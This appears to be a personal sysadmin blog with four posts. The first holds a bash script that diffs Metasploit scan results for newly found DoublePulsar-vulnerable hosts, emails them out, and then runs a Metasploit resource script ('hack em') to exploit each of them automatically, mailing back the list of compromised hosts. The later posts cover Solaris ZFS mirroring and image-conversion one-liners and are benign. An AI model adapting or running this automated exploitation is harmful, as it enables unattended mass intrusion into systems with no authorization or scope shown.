Wednesday, September 26, 2018

automate exploiting newly-found doublepulsar vulnerable hosts

i've written about how to automate discovery. let's go to the next level and automate reporting on and exploiting newly-discovered doublepulsar vulnerable hosts.

this assumes you already have a list of vulnerable hosts from a previous run, which today's results are diffed against.
```sh
#!/bin/bash
PROCESS=/root/doublepulsar.scan/exploit
TODAY=$(date '+%Y%m%d')
YESTERDAY=$(date -d "yesterday" '+%Y%m%d')

cd "$PROCESS" || exit 1

# dump vulns
msfconsole -x "color false ; vulns -o $PROCESS/vulndetect.$TODAY ; exit"
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $PROCESS/vulndetect.$TODAY \
    > $PROCESS/vulnparsed.$TODAY
# keep only the '+' (added) lines of the diff, minus the hunk and file headers
diff -u $PROCESS/vuln.$YESTERDAY $PROCESS/vulnparsed.$TODAY | grep + | grep -v @ \
    | grep -v +++ | sed 's/+//g' > $PROCESS/vuln.$TODAY
# the option is THREADS; "set thread" would be silently ignored
msfconsole -x "color false ; spool $PROCESS/output.$TODAY ; use auxiliary/scanner/smb/smb_version; set RHOSTS file:$PROCESS/vuln.$TODAY ; set THREADS 100; run; exit"
echo $TODAY > $PROCESS/mail.$TODAY
cat $PROCESS/vuln.$TODAY $PROCESS/output.$TODAY >> $PROCESS/mail.$TODAY
mail -s "new doublepulsar vuln hosts $TODAY " me@in.hell < $PROCESS/mail.$TODAY
rm $PROCESS/vulnparsed.*
rm $PROCESS/vulndetect.*
rm $PROCESS/mail.$TODAY

cp $PROCESS/vuln.$TODAY /root/.msf4/thewicked

# hack em
kill -9 `ps -ef|grep msfconsole| awk '{print $2}'`
msfconsole -r "/root/.msf4/doublepulsar-loop.rc ; exit"
ls /root/.msf4/logs/sessions | grep $TODAY \
    | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY
mail -s "new doublepulsar vuln hosts exploited $TODAY " me@in.hell < $PROCESS/exploited.$TODAY
rm $PROCESS/exploited.$TODAY

exit
```
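the reporting half of that script hinges on the diff step, and pulling `+` lines out of `diff -u` and stripping the plus signs is the fragile part: it depends on the hunk and file headers being filtered correctly, and it says nothing about hosts that dropped off the list. the following is an added example (not from the post above) that does the same day-over-day comparison as a set difference with `comm`, and also reports hosts that are no longer detected, which is what whoever is tracking remediation wants to see. the function names and the sample dump lines are constructed for the example; the input format is simply "any line containing an IPv4 address is one detection", as in the original grep.

```shell
#!/bin/sh
# Added example, not from the original post: compute newly detected hosts
# (and hosts that dropped off) between two daily vulnerability dumps as a
# set difference instead of grepping '+' lines out of `diff -u` output.
# Any line containing an IPv4 address counts as one detection.
LC_ALL=C
export LC_ALL

# extract_ips FILE: unique, sorted IPv4 addresses found in FILE.
extract_ips() {
    grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' "$1" | sort -u
}

# set_diff MODE OLD NEW: MODE -13 prints addresses only in NEW, -23 only in OLD.
set_diff() {
    o=$(mktemp) && n=$(mktemp) || return 1
    extract_ips "$2" > "$o"
    extract_ips "$3" > "$n"
    comm "$1" "$o" "$n"
    rm -f "$o" "$n"
}

# new_hosts OLD NEW: hosts detected today that were not in yesterday's list.
new_hosts()  { set_diff -13 "$1" "$2"; }

# gone_hosts OLD NEW: hosts in yesterday's list that are not detected today
# (remediated, offline, or missed by today's scan; worth a look either way).
gone_hosts() { set_diff -23 "$1" "$2"; }

# host_report OLD NEW: the text you would mail, both directions of the diff.
host_report() {
    echo "new vulnerable hosts:"
    new_hosts "$1" "$2" | sed 's/^/  /'
    echo "no longer detected:"
    gone_hosts "$1" "$2" | sed 's/^/  /'
}

# Constructed sample dumps standing in for vulndetect.YYYYMMDD (not real data).
SAMPLE_OLD=$(mktemp) ; SAMPLE_NEW=$(mktemp)
trap 'rm -f "$SAMPLE_OLD" "$SAMPLE_NEW"' EXIT
cat > "$SAMPLE_OLD" <<'EOF'
2018-09-25 host 10.0.0.5    port 445 DoublePulsar SMB implant detected
2018-09-25 host 10.0.0.9    port 445 DoublePulsar SMB implant detected
2018-09-25 host 10.0.1.20   port 445 DoublePulsar SMB implant detected
EOF
cat > "$SAMPLE_NEW" <<'EOF'
2018-09-26 host 10.0.0.5    port 445 DoublePulsar SMB implant detected
2018-09-26 host 10.0.1.20   port 445 DoublePulsar SMB implant detected
2018-09-26 host 10.0.1.21   port 445 DoublePulsar SMB implant detected
2018-09-26 host 10.0.1.21   port 445 DoublePulsar SMB implant detected
2018-09-26 host 192.168.7.3 port 445 DoublePulsar SMB implant detected
EOF

# With two file arguments, compare those; otherwise run on the constructed sample.
if [ $# -eq 2 ]; then host_report "$1" "$2"; else host_report "$SAMPLE_OLD" "$SAMPLE_NEW"; fi
```

`sort -u` collapses the duplicate detection of 10.0.1.21, and `LC_ALL=C` keeps `sort` and `comm` on the same collation, which is the usual reason `comm` complains about unsorted input. dropping `host_report`'s output into the mail step of the script above replaces the `diff | grep | sed` chain.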

Monday, September 24, 2018

no raid-1? try zfs-mirror in sol11. but wait...

i installed solaris 11.14 on a decade-old system. i was really happy it installed. and then i remembered: i was never offered the option to mirror anything; it just installed while i hit f2, f2, f2. i want something like raid-1. this is solaris, so i can do zfs mirroring. good enough. oh, and i installed over an old system, so there's that. what i ended up doing was grabbing the partition table from the first (zfs-pool holding) disk and writing it over that of the second disk, since my relabel command was ignored. after that, i created my mirror pool and all was well with the world.

   
   
```
zpool status rpool
  pool: rpool
 state: ONLINE
  scan: none requested
config:

        NAME                       STATE     READ WRITE CKSUM
        rpool                      ONLINE       0     0     0
          c0t5000CCA022532534d0s0  ONLINE       0     0     0

errors: No known data errors
```

only disk in rpool: c0t5000CCA022532534d0s0

```
[root@blackhole ~]# format
Searching for disks...done


AVAILABLE DISK SELECTIONS:
       0. c0t5000CCA022532534d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
          /scsi_vhci/disk@g5000cca022532534
          /dev/chassis/SYS/HDD0/disk
       1. c0t5000CCA022543154d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
          /scsi_vhci/disk@g5000cca022543154
          /dev/chassis/SYS/HDD1/disk
```

1 is the second disk.

1. verify it has a partition 0. it does!

```
[root@blackhole ~]# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
vdev verification failed: use -f to override the following errors:
/dev/dsk/c0t5000CCA022543154d0s0 contains a ufs filesystem.
Unable to build pool from specified devices: device already in use
```

Nope. relabel it with format:

```
format -e
<select 1>
format> p        [partition editor]
format> label
Specify Label type[0]: 0
Ready to label disk, continue? y
```

```
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
cannot attach c0t5000CCA022543154d0s0 to c0t5000CCA022532534d0s0: device is too small
```

Still nope. compare the partition tables:

```
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0
* /dev/dsk/c0t5000CCA022532534d0s0 (volume "solaris") partition map
*
* Dimensions:
*     512 bytes/sector
*     625 sectors/track
*      20 tracks/cylinder
*   12500 sectors/cylinder
*   46875 cylinders
*   46873 accessible cylinders
*
* Flags:
*   1: unmountable
*  10: read-only
*
*                          First     Sector    Last
* Partition  Tag  Flags    Sector     Count    Sector  Mount Directory
       0      2    00          0  585912500  585912499
       2      5    01          0  585912500  585912499
```

okay.

```
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
*     512 bytes/sector
*     625 sectors/track
*      20 tracks/cylinder
*   12500 sectors/cylinder
*   46875 cylinders
*   46873 accessible cylinders
*
* Flags:
*   1: unmountable
*  10: read-only
*
*                          First     Sector    Last
* Partition  Tag  Flags    Sector     Count    Sector  Mount Directory
       0      2    00          0     262500     262499
       1      3    01     262500     262500     524999
       2      5    01          0  585912500  585912499
       6      4    00     525000  585387500  585912499
```

NOT okay. slice 0 on the second disk is only 262500 sectors, which is why the attach says the device is too small. so copy the first disk's table onto the second:

```
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0 > /tmp/dsk0-part.dump

root@blackhole:~# fmthard -s /tmp/dsk0-part.dump /dev/rdsk/c0t5000CCA022543154d0s0
fmthard: New volume table of contents now in place.
```

Verify the VTOC on c0t5000CCA022543154d0s0. We're going to do something wicked.

```
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
*     512 bytes/sector
*     625 sectors/track
*      20 tracks/cylinder
*   12500 sectors/cylinder
*   46875 cylinders
*   46873 accessible cylinders
*
* Flags:
*   1: unmountable
*  10: read-only
*
*                          First     Sector    Last
* Partition  Tag  Flags    Sector     Count    Sector  Mount Directory
       0      2    00          0  585912500  585912499
       2      5    01          0  585912500  585912499
```

This is okay.

```
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
Make sure to wait until resilver is done before rebooting.
```

This is much better.

```
root@blackhole:~# zpool status rpool
  pool: rpool
 state: ONLINE
  scan: resilvered 21.9G in 2m52s with 0 errors on Mon Sep 24 15:39:51 2018

config:

        NAME                         STATE     READ WRITE CKSUM
        rpool                        ONLINE       0     0     0
          mirror-0                   ONLINE       0     0     0
            c0t5000CCA022532534d0s0  ONLINE       0     0     0
            c0t5000CCA022543154d0s0  ONLINE       0     0     0

errors: No known data errors
```

This is much much better.

```
root@blackhole:~# zpool list rpool
NAME    SIZE  ALLOC   FREE  CAP  DEDUP  HEALTH  ALTROOT
rpool   278G  38.2G   240G  13%  1.00x  ONLINE  -
```

We are golden!
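the "device is too small" error came from the slice sizes, and you only find that out after the attach fails. the following is an added example (not from the post) of a pre-flight check that reads two saved `prtvtoc` dumps and compares the sector count of a given slice, so the mismatch is visible before `zpool attach` or `fmthard` touches anything. the two embedded dumps are copied from the listings above (abridged to the dimension and partition lines); the function names are made up for the example.

```shell
#!/bin/sh
# Added example, not from the original post: compare a slice's sector count
# between two prtvtoc dumps before attempting `zpool attach`.

# slice_sectors DUMP SLICE: print the sector count of partition SLICE from a
# prtvtoc dump. Data lines are "Partition Tag Flags First Count Last [Mount]";
# comment lines start with '*'. Fails if the slice is not in the table.
slice_sectors() {
    awk -v s="$2" '$1 !~ /^\*/ && NF >= 6 && $1 == s { print $5; found = 1 }
                   END { if (!found) exit 1 }' "$1"
}

# vtoc_matches SRC DST SLICE: succeed only if DST's slice is at least as large
# as SRC's, which is what zpool attach requires; print a one-line verdict.
vtoc_matches() {
    src=$(slice_sectors "$1" "$3") || { echo "slice $3 missing in $1"; return 2; }
    dst=$(slice_sectors "$2" "$3") || { echo "slice $3 missing in $2"; return 2; }
    if [ "$dst" -lt "$src" ]; then
        echo "slice $3: target has $dst sectors, needs $src: too small"
        return 1
    fi
    echo "slice $3: target has $dst sectors, needs $src: ok"
    return 0
}

# The two dumps from the post (pool disk first, second disk before relabel).
DSK0=$(mktemp) ; DSK1=$(mktemp)
trap 'rm -f "$DSK0" "$DSK1"' EXIT
cat > "$DSK0" <<'EOF'
* /dev/dsk/c0t5000CCA022532534d0s0 (volume "solaris") partition map
*
* Dimensions:
*     512 bytes/sector
*   46873 accessible cylinders
*
*                          First     Sector    Last
* Partition  Tag  Flags    Sector     Count    Sector  Mount Directory
       0      2    00          0  585912500  585912499
       2      5    01          0  585912500  585912499
EOF
cat > "$DSK1" <<'EOF'
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
*     512 bytes/sector
*   46873 accessible cylinders
*
*                          First     Sector    Last
* Partition  Tag  Flags    Sector     Count    Sector  Mount Directory
       0      2    00          0     262500     262499
       1      3    01     262500     262500     524999
       2      5    01          0  585912500  585912499
       6      4    00     525000  585387500  585912499
EOF

# Usage: check slice 0 (the slice rpool lives on) before attaching for real.
if vtoc_matches "$DSK0" "$DSK1" 0; then
    echo "safe to attach"
else
    echo "do not attach; copy the VTOC first (prtvtoc ... | fmthard -s)"
fi
```

on a live system you would feed it `prtvtoc /dev/dsk/<disk>s0 > /tmp/<disk>.vtoc` for each disk, exactly as the post did for the first disk. the check reports "too small" for slice 0 here and "ok" for slice 2 (the whole-disk slice is identical on both), which matches what `zpool attach` said.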

Saturday, September 22, 2018

macos split all the jpgs in a directory in half

```sh
# read into a variable name, not "$i"; quote so paths with spaces survive
find . -name "*.jpg" | while read -r i; do convert "$i" -crop 50%x100% +repage "$i"; done
```

a play on:
```sh
convert input.png -crop 50%x100% +repage input.png
```

Monday, September 17, 2018

macos terminal convert pdf to jpg

```sh
# strip only the trailing .pdf; sed "s/pdf/jpg/g" would also rewrite "pdf" inside directory names
find . -name "*.pdf" | while read -r filename; do sips -s format jpeg "$filename" --out "${filename%.pdf}.jpg"; done
```